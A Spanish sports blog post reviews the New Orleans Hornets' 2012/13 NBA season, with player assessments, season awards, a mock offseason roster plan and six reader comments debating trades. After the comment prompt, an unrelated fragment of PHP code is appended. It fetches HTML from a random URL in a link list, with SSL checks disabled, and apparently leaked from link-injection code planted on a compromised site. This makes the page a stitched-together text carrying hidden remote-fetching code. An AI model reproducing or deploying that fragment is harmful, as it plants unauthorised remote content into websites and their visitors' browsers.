New Orleans Hornets: Aprobado

29 de June de 2013 por txusma

Viva_Dirk clavó el pronóstico que hizo a principios de temporada. Los Hornets (a partir de ya mismo, Pelicans) han acabado la temporada con 27 victorias, dentro de la horquilla que preveíamos. De hecho, el curso ha discurrido sin grandes sorpresas ni sobresaltos más allá de las múltiples pequeñas lesiones que ha ido padeciendo Anthony Davis. El número 1 del draft no ha dominado todo lo que se esperaba pero cuando ha jugado ha demostrado que puede marcar diferencias en defensa y que no es manco en ataque. El año que viene, adaptado al juego y a la dureza del calendario NBA, debería confirmarnos que Anthony Davis puede ser el jugador franquicia que esperan en New Orleans. Otro que ha ido lidiando con las lesiones ha sido Eric Gordon. Renovado a precio de estrella, el ex de los Clippers ha disputado la mitad de los partidos de la temporada. Debutó en diciembre y siguió un estricto régimen de racionamiento de minutos, perdiéndose los segundos partidos de los back-to-back. Lejos del 100% de forma, Gordon ha alternado partidos desastrosos (incluso con indicios de desidia) con actuaciones muy destacadas, dejando detalles de un talento al que no se le permite emerger por culpa de las lesiones. 

En cambio el trío formado por Greivis Vasquez, Ryan Anderson y Robin Lopez se ha mantenido sano y ha cumplido por encima de las expectativas. Como se preveía tras el traspaso de Jarrett Jack, el base venezolano se hizo con el control del equipo desde el principio. Ha dirigido a sus compañeros con maestría y ha demostrado una buena visión de juego que le ha permitido acabar tercero en la clasificación de los máximos asistentes de la liga y segundo en la votación por el Most Improved Player. De todas maneras, no todo son rosas. Vasquez ha sido un coladero en defensa y ha de mejorar mucho su tiro si quiere afianzarse con un puesto de titular. Por su parte, el ex de Orlando ha demostrado que hay vida más allá de Dwight Howard. No ha estado tan súper como hace 2 años pero es que en los Pelicans el balón ha pasado más por sus manos y se ha visto forzado a crearse más tiros. Saliendo desde el banco ha promediado 16’2 puntos pero lo curioso es que ha tirado más y mejor cuando era titular llegando a los 18’2 puntos y el 42% de acierto desde el triple. Estos datos, unidos a la buena pareja que forman Anderson y Davis, tal vez hagan replantearse algunas cosas al cuerpo técnico, como por ejemplo el rol de Robin Lopez. El ex de los Suns ha superado todas las expectativas en su primer temporada en el equipo, principalmente porque poca gente aseguraba tener alguna. Se ha destapado como un jugador muy válido a ambos lados de la pista, algo más que un trozo de carne al que enviar para cansar a los pívots rivales. Ahora mismo, no se me ocurre un jugador mejor, relación calidad-precio, para compartir frontcourt con Davis y Anderson. Está por ver si ha de salir de titular o si ha de empezar desde el banco y dar descanso a los 2 titulares, alternándose con ellos y formando juegos interiores bastante diferentes entre sí.

Brian Roberts ha sido otra de las sorpresas agradables. Tras 4 años en la universidad no fue drafteado y emigró a Europa (1 año en Israel y 3 en Alemania). Tras unas buenas ligas de verano, firmó por el mínimo y su rendimiento ha sido más que correcto. Por el precio que cobrar podríamos decir que Roberts es una auténtica ganga. En el apartado de decepciones tenemos que incluir a Al-Farouq Aminu y sobretodo a Austin Rivers. El ex de los Clippers ha sido el alero titular y ha mejorado en varios aspectos, destacando sobretodo en el aspecto reboteador. De todas maneras parece que se va a quedar a medio camino y que no tenemos ante nosotros a una estrella en ciernes. El caso de Rivers es mucho más dramático. No en vano su temporada ha sido catalogada por algún analista como “la peor de la historia”. Sus medias estadísticas se han situado por debajo de la del resto de los escoltas en todas las categorías y en defensa tampoco ha destacado. ¿Fracaso? Todavía no se puede hablar así de un jugador de 19 años pero se han encendido las alarmas en New Orleans.

Los Hornets han ejecutado durante la temporada 2012/2013 el plan previsto. Han dado tiempo de juego a los jóvenes, han dejado que Gordon se recuperara sin agobios, han asigando nuevos roles a Anderson y Lopez… Las bases se iban consolidando hasta que la noche del draft el plan ha saltado un poco por los aires. La llegada de Jrue Holiday abre todo un abanico de posibilidades que ya tendremos tiempo de analizar en nuestra previa de la temporada. También tendremos que decir adiós a los Hornets y hola a los Pelicans. Cambios profundos en Luisiana.

PREMIOS

MVP: Ryan Anderson ha cuajado una gran temporada lejos de la influencia de Dwight Howard. Acabó con 16’2 puntos y 6’4 rebotes (2’4 ofensivos). Greivis Vasquez también ha cuajado un buen año tras anotar 14 puntos y repartir 9 asistencias por partido.

Rookie: Las lesiones le han molestado durante la temporada pero en los 64 partidos jugados Anthony Davis ha dejado muestras de sus enormes dotes defensivas. En apenas 28 minutos de juego ha promediado 8’2 rebotes, 1’2 robos y 1’8 tapones. Además ha anotado 13’5 puntos.

Sorpresa: Brian Roberts ha jugado 17 minutos por partido y ha aportado 7 puntos y casi 3 asistencias por partido. Para un jugador llegado en el tiempo de descuento y del que pocos esperaban un impacto real no está nada mal. Robin Lopez y sus 11’3 y 5’6 puntos por partido también merecen aparecer en este apartado.

Decepción: Terrible primer año de Austin Rivers. A pesar de disputar 23 minutos por partido, el ex de Duke solo ha anotado 6’2 puntos con unos porcentajes de acierto del 32%.

JUGANDO A GM

Cualquier idea que podríamos tener antes del draft saltó por los aires tras el traspaso de Nerlens Noel, escogido con la sexta elección, a Philadelphia a cambio de Jrue Holiday. Cuando hablamos del ya ex base de los Sixers olvidamos que tiene 23 años recién cumplidos, apenas 1 mes más que, por ejemplo, el rookie del año Damian Lillard. Es un jugador de presente (All-Star este mismo año) pero también de futuro, con un techo mucho más alto que Greivis Vasquez.

El traspaso también deja claro que el propietario de los Hornets quiere volver a pelear ya por entrar en los Playoffs. Con los movimientos adecuados es posible que lo consigan más pronto que tarde.

– Los Hornets cuentan ahora mismo con un núcleo muy interesante formado por Jrue Holiday, Anthony Davis y Ryan Anderson, todos con salarios ajustados a su rendimiento.
– El fichaje de Jrue Holiday quita presión sobre la renovación de Greivis Vazquez. Seguramente, de mediar otra temporada como la actual, el venezolano habría recibido una buena oferta por parte de algún otro equipo de la NBA, una oferta que podría no estar muy lejos de lo que cobra actualmente Holiday. Ya no hay urgencias para renovarlo e incluso podríamos estudiar algún traspaso que nos trajera de vuelta un alero interesante. Con Brian Roberts tenemos cubierta la posición de base suplente. Tal vez a los Raptors les interese un Vasquez x Landry Fields.
– Eric Gordon es prácticamente intraspasable y lo más probable es que nos traguemos su enorme salario durante 2 ó 3 temporadas. Lo mejor es rezar para que se mantenga sano e incorporarlo mentalmente para la causa. Si no se motiva con  los compañeros que lo rodean es que no le gusta este deporte. Si es capaz de jugar 60 partidos plenamente entregado dispondremos de uno de los mejores anotadores de la liga.
– Jrue Holiday es un buen defensor pero sería conveniente incorporar a un escolta que destaque en este aspecto. Es un lástima que los Hornets no tuvieran una elección de 2ª ronda. Un jugador como Jamaal Franklin hubiese sido perfecto. ¿Porqué no ofrecer un contrato al jugador con el que le comparan? ¿Convenceríamos a Tony Allen con 8 kilos x 2 años? Gerald Henderson sería otra opción interesante. No es mal defensor y puede saltar de titular cuando falle Eric Gordon. Le ofrecería la Mid Level.
– Los Hornets no ejercieron la Team Option sobre Aminu, lo que significa que al acabar esta temporada es agente libre y que además, si lo queremos renovar, sólo podremos ofrecerle 3’5 kilos el primer año. ¿Será suficiente para renovarlo? Le podemos ofrecer 9 millones x 3 años aunque es posible que debido a su buena capacidad reboteadora y a un hipotético y pequeño margen de mejora, algún equipo se tire a la piscina y le haga una oferta cercana a la Mid Level. Si este es el caso habrá que buscar alguna otra cosa en el mercado. Si hemos traspasado a Vasquez por un alero y hemos fichado a Gerald Henderson no me preocuparía mucho pero sinó podríamos estudiar ofertas para Dorell Wright,  Chase Budinger o Corey Brewer.
– El juego interior no lo tocaría mucho. Anderson, Davis, Lopez (sobre el que ejerciría la Team Option) y Smith permiten confeccionar parejas muy diferentes adaptables a diferentes estilos y momentos del juego.

Con los cambios propuestos nos podríamos encontrar con un equipo con:

Bases: Jrue Holiday, Brian Roberts
Escoltas: Eric Gordon, Gerald Henderson, Austin Rivers
Aleros: Landry Fields, Chase Budinger
Ala-Pívot: Anthony Davis, Ryan Anderson
Pívot: Robin Lopez, Jason Smith

Comenta

6 comentarios a esta entrada

  1. Esteban dice:
    #1

    comparto en la mayoria de los conceptos

    gordon es un escolta de nivel all-star sin dudas, las lesiones son su punto debil, y bastante debil, pero si logra mantenerse sano, los pelicans pueden pelear por PO este mismo año

    aminu no vale la pena el esfuerzo, es verdad que rebotea y defiende, pero eso mismo pueden hacer miles de aleros en la liga incluso por el minimo salarial

    yo me la jugaria mas vale como has dicho con por ejemplo Wright, que aceptaria la Mid Level y al menos anota los triples abiertos

    el movimiento por HOLIDAY es sensacional, consiguen un all-star con enorme presente y mucho futuro por una supuesta estrella con historial de lesiones como NOEL,
    lo cierto es que los pelicans con el nucleo joven que significa davis, rivers, andersen, gordon, lopez y ¿aminu? ya no necesita reconstruir, pues se volveria la reconstruccion eterna que solian hacer los clippers,
    es hora de mejorar hoy y holiday mejora

    no se ustedes, pero si gordon se mantiene sano, los veo en PO este año, y si davis es lo bueno que todos creemos que es, los veo como un aspirante en los proximos dos

    una retaguardia con gordon y holiday, puede aportar cerca de lso 40 puntos por juegos, sin ser jugadores negados en defensa, mas un sexto hombre del nivel de anderson, que no es facil de conseguir, solo les falta su MVP
    si Davis se afianza como un 20/10 que esta llamado a ser, los pelicans pueden ser aspirantes a todo en los proximos 3 o 4 años

      Citar

  2. lost dice:
    #2

    Acaba de salir un secreto a voces que los Pelicans estuvieron a punto de aceptar un traspaso por Tyson Chandler, que ya jugó por los lares cuando CP3 era el PG titular. El pívot de los Knicks iba junto al pick 24 de NY a Nueva Orleans por Ryan Anderson y el pick 6.
    Creo que hubiesen hecho MUY bien de aceptar ese trade porque ganaban en presencia en la zona, enviando a A. Davis a su puesto real que es el de 4. Que no hubiesen seleccionado a Noel y no lo habrían tradeado por Holiday?Seguro, pero también podrían hacer un Vásquez por Holiday a pelo, pero yo me quedaba con el venezolano si o si, y con una pareja Davis-Chandler te puedes meter perfectamente en POs en el Oeste.

    Ahora, con el equipo que tienen, lo más lógico es que renueven a Smith, que es un buen trozo de carne para gastar las 6 faltas, y cojan a un par de 2-3 agentes libres para la rotación exterior. La llegada de Holiday a NO a mi me parece que puede ir en 2 direcciones: o se va Vásquez, que no lo deben echar por nada, junto a Davis s su mejor activo, o echan a Gordon y ponen a Holiday a jugar de 2. Creo que echaran a Gordon y me parece que lo enviarán a Phoenix. Los Suns han escogido a Len, buen C, y quieren deshacerse de Gortat, así que creo que el trade puede ser una cosa así:
    NO recibe a Gortat, Dudley o S&T de Wes Johnson y alguna trade exception/un mínimo/ronda futura
    Suns recibe a Eric Gordon

    PD: En definitiva, que si no la cagan mucho en los despachos, yo les veo entrando en PO.

      Citar

  3. lost dice:
    #3

    Y por favor, un Greivis x Fields es un atraco para la posteridad. Fields ha estado 3 años en esta liga y solo su primera campaña con el sistema D’antoni en los Knicks pre melodrama funcionó. Lo de Gordon yo creo que: o lo mueven a Phoenix o se lo intentan encasquetar a Milwaukee, no hay más, lo único que se sabe es que él quiere ir a los Suns y el GM de Phoenix está desesperado.
    Si pueden firmar a Gerald Henderson no me lo pensaba, pero nada que pase de los 4M/año, necesitan puntos des del backcourt como el comer.

    Saludos!

      Citar

  4. Sancho88 dice:
    #4

    Supongo que Monty Williams buscaba algo parecido a Chris Paul al pensar en Jrue Holiday. Objetivamente, Holiday es más anotador que Vásquez, mejor defensor y con más físico, pero tengo mis dudas sobre si tiene mejor visión de juego, o si pueden jugar los dos juntos. Por eso supongo que buscarán un alero en el mercado a cambio de Vásquez o plantear un backourt de tres jugadores importantes Holiday-Vásquez-Gordon. Teniendo en cuenta el estado de salud de Gordon no sería mala idea rotar a los tres en la posición de 1 y 2. Luego la zona está bastante bien. Anderson ha demostrado compromiso, aunque le falta todo en defensa, y Jason Smith es un gran relevo para Davis o Robin López. Ojalá que sigan trabajando con López. Pienso que puede convertirse en un jugado de bastante clase. Lo único que veo que le falta al equipo es un alero de confianza. Aminu vale para rotar, pero no para ser titular. Viendo que Kirilenko ha salido a la agencia libre renunciando a su último año de contrato, los Pelicans podrían ofrecerle bastante dinero en una multianual. Tienen mucho espacio salarial. Así les podría quedar un equipo muy gracioso con:

    Holiday-Gordon-Kirilenko-Davis-R. López

    y un buen equipo suplente

    Vásquez-Roberts-Aminu-Anderson-Smith

    Podrían aspirar a Playoffs, sobre todo sabiendo que Monty Williams ha tenido retos igual de difíciles y los ha sacado adelante. Huele a que van a tener una muy buena temporada. A ver si Austin Rivers espabila, que cualidades tiene, y añade calidad a un backourt muy completo

      Citar

  5. Simon dice:
    #5

    Pues a mi Ryan Anderson y el pick 6 por Chandler y el 24 me parece un atraco a mano armada para NOLA. Mola el equipo que se le quedaría con esos movimientos aunque si Gordon no está sano al 100×100 es un equipo que le falta mucha anotación.
    Bucks va a perder a Ellis si o si… un Sing and trade por el a cambio de Gordon?? Al 100×100 considero a Gordon bastante mejor jugador que Ellis… pero se pierde muchos partidos y además que aunque se mantenga sano seguro que tanta lesión afectará mas pronto que tarde a su rendimiento y su físico… Por parte de Bucks les puede interesar, se hacen con un jugador mejor que Ellis ( que lo iban a perder ) y mantienen el bloque, aunque quizás su intención sea tankear directamente como la de tantos equipos… sobre todo en el Este…

      Citar

  6. Txusma dice:
    #6

    lost:
    Y por favor, un Greivis x Fields es un atraco para la posteridad. Fields ha estado 3 años en esta liga y solo su primera campaña con el sistema D’antoni en los Knicks pre melodrama funcionó.

    Este año sólo ha jugado 20 minutos por partido pero he de reconocer que no sé si por culpa de lesiones, si por desidia, si por mal nivel… Había dado la idea buscando un alero buen defensor que tomara decisiones correctas y tirara con acierto.
    Hay q tener en cuenta que a Vasquez hay q traspasarlo pq el año q viene lo vas a perder sí o sí. Es un caso como el de Bledsoe

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>